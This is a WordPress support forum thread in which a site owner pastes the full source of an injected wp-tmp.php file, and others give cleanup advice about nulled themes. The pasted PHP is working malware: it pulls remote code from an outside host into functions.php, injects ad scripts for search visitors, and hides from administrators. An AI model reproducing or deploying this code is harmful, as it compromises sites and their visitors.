Support » Plugin: Wordfence Security - Firewall & Malware Scan » Warnings: * Unknown file in WordPress core: wp-includes/wp-tmp.php

  • Resolved Revived

    (@revived)


    Received that this morning. What should I do?

    Here’s the code within wp-tmp.php:

    ini_set('display_errors', 0);
    error_reporting(0);
    $wp_auth_key='87b83c0568dfdee2d0d59bf8a221c00e';
    
    //echo "rrrr".get_template_directory();
    $file=file_get_contents(get_template_directory().'/functions.php');
    
    $pat_code='/div_code_name[\s\S]*?(if \( ! function_exists[\s\S]*?extract\([\s\S]*?)\?>/i';
    if(preg_match_all($pat_code, $file, $matches_pat_code))
    
    {
    
    $toreplace=$matches_pat_code[1][0];
    //echo $toreplace;
    
    $newxc=file_get_contents('http://www.dolsh.cc/new4.txt');
    
    if (stripos($newxc, $wp_auth_key) !== false) 
    {
    $new_file=str_replace($toreplace,$newxc,$file);
    @file_put_contents(get_template_directory().'/functions.php',$new_file);
    }
    
    }
    
    //@file_put_contents($funcfile,$file);
    
    if ( ! function_exists( 'slider_option' ) ) {  
    function slider_option($content){ 
    if(is_single())
    {
    
    $con2 = '
    
    <script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1426161"></script>
    
    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1426162&interactive=1&pushup=1"></script>
    
    ';
    
    $content=$content.$con2;
    }
    return $content;
    } 
    
    function slider_option_footer(){ 
    if(!is_single())
    {
    
    $con2 = '
    
    <script type="text/javascript" src="//go.onclasrv.com/apu.php?zoneid=1426161"></script>
    
    <script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=1426162&interactive=1&pushup=1"></script>
    
    ';
    
    echo $con2;
    }
    } 
    
    function setting_my_first_cookie() {
      setcookie( 'wordpress_cf_adm_use_adm',1, time()+3600*24*1000, COOKIEPATH, COOKIE_DOMAIN);
      }
    
    if(is_user_logged_in())
    {
    add_action( 'init', 'setting_my_first_cookie',1 );
    }
    
    if( current_user_can('edit_others_pages'))
    {
    
    if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
    {
    $ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
    }
    
    if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
    {
    $ip.=$_SERVER['REMOTE_ADDR'].'
    ';
    @file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
    
    }
    
    }
    
    $ref = $_SERVER['HTTP_REFERER'];
    $SE = array('google.','/search?','images.google.', 'web.info.com', 'search.','yahoo.','yandex','msn.','baidu','bing.','doubleclick.net','googleweblight.com');
    foreach ($SE as $source) {
      if (strpos($ref,$source)!==false) {
        setcookie("sevisitor", 1, time()+120, COOKIEPATH, COOKIE_DOMAIN); 
    	$sevisitor=true;
      }
    }
    
    if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in()) 
    {
    $adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
    if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
    {
    if($sevisitor==true || isset($_COOKIE['sevisitor']))
    {
    add_filter('the_content','slider_option');
    add_action('wp_footer','slider_option_footer');
    }
    
    }
    } 
    
    }
    
    • This topic was modified 2 years ago by Revived.
Viewing 15 replies - 1 through 15 (of 17 total)
  • Liam McArthur

    (@liammcarthur)

    That looks like a very suspicious file and it certainly isn’t part of the WordPress core. I’d get this file removed, make sure that all of your file permissions are correct (not 777 recursively, for example) and remove any potentially vulnerable plugins and code.

    wfyann

    (@wfyann)

    Hi @revived,

    As mentioned by @liammcarthur, this is not a standard WordPress core file and the code contains external links (already suspicious) which, moreover are blacklisted.

    Please make sure to follow our site cleaning guide in order to restore your site’s integrity.

    bluebearmedia

    (@bluebearmedia)

    (redundant post deleted by author)

    Revived

    (@revived)

    How can I safeguard against this in the future?

    wfyann

    (@wfyann)

    @revived,

    The references mentioned by @bluebearmedia, in his (since removed) post, perfectly address your question.

    Please look into the following articles from our Learning Center:

    You will find useful tips to secure your site.

    • This reply was modified 2 years ago by wfyann. Reason: "find" not "feed"
    Revived

    (@revived)

    How is this done? For shared hosting, ensure that sites are isolated or “jailed”

    wfyann

    (@wfyann)

    Hi @revived,

    That specific point would have to be discussed with your hosting provider.
    You need to check with them what solution they have in place to ensure users can’t get access to one another’s environment.

    One thing you can do on your end is to avoid hosting more than one site on each hosting account; because if one gets infected the other one(s) will as well.

    This occurs by using NULLED themes and plugins

    You have to know that everything nulled is contaminated by malicious code.

    When Nulled is installed, the code wakes up at a certain moment, goes through all the folders of your hosting, and installs a script in addition to adding several files.

    wp-vcd.php
    wp-tmp.php:

    AND ALSO modifies
    post.php
    functions.php

    • This reply was modified 1 year, 11 months ago by Marcelo Mika.

    That’s EXACTLY what happened, Marcelo. I’ve not heard the term NULLED before in this context. Can you elaborate?

    Hello!
    I have the same problem. I delete the malware code from function.php in all my installation themes but it keeps coming back. Anyone found a solution on this? Please help!

    • This reply was modified 1 year, 10 months ago by burst24.

    In my case, I have multiple WordPress installations in one hosting account. Each installation is it’s own add-on domain and I had this issue on I think 5 out of 7 installations. I read somewhere, while researching this dilemma, that if the affected code/files are not removed from all locations, then it will replicate.

    I also read, and I believe this is most important, is to clean out the added code in your functions.php file(s), presumably in your child theme folders. I can assure you with near absolute certainty that it/they were modified with the code that keeps this malware active.

    Do you have other installs on the server?

    • This reply was modified 1 year, 10 months ago by Revived.

    I have removed the malware code from functions.php in all my installations along with wp-tmp and wp-vcd files but the malware reapears. There must be hiding elsewere too. Even on a local install and having functions.php read only. The malware managed to add the code inside again. Any thoughts?

    At a loss, sorry. I’m fairly certain that removing the code block from ALL function.php files in ALL my installations seemed to work for me because I no longer have had this issue.

    Maybe try something in this thread? https://wordpress.org/support/topic/wp-feed-php/

    Joel

    (@joelmasci)

    in short, the code found in functions.php, wp-vcd.php and wp-tmp.php create the code in the other files each time the code is run. You definitely won’t get anywhere unless you ensure nobody is visiting the site while you clean the files. I suggest commenting out the code at first because the codes checks files to see if it has an exact string anywhere in the file as an indicator of whether the file needs to code to be added. even logging in to ep admin or performing any action such as a security scan or even activating a plugin via wp-cli will actually cause the code to run, possibly re inserting itself to where it previously was. The other issue is other WordPress installs in the same hosting environment, since if those are contaminated then the code may reappear. some more testing is needed as i potentially have not found all sources of the code, and many things im unsure of. but one thing is for sure is that trying to debug by logging into wp admin on a live site, will probably not work. Best to start with fresh WordPress install, delete and re install all plugins then move theme files over while being careful to remove infected code first. even if you attempt to deactivate your theme, thinking that code in functions.php won’t run, it’s possible the hacker visits that url directly, causing it to run. so try to commenting first, then deleting solution, and use fresh install if that doesn’t work.

    my apologies for being late!

    Could you solve it?

    If they could not, the best thing is:

    1. Check all the WordPress sites in the shared hosting.
    2. Deactivate and eliminate each Plugin or theme from DOWNLOAD NULLED
    3. Search all the files function.php the malicious code, and delete it, save file changes.
    4 Search files :

    wp-feed.php
    wp-vcd.php
    wp-tmp.php

    – These can change location, before removing the code from function.php it is convenient to see what are the path that you specify for these files.

    This would have to clean the installation of each domain in the hosting.

    Recommendation: before starting, make a backup of each site.

    To know when the site was modified for the last time, list the folders so by modification date.

    Generally, when something is modified within them, the date changes, and that gives us a clue as to where you could hide malicious code.

    Saludos.

Viewing 15 replies - 1 through 15 (of 17 total)
  • The topic ‘Warnings: * Unknown file in WordPress core: wp-includes/wp-tmp.php’ is closed to new replies.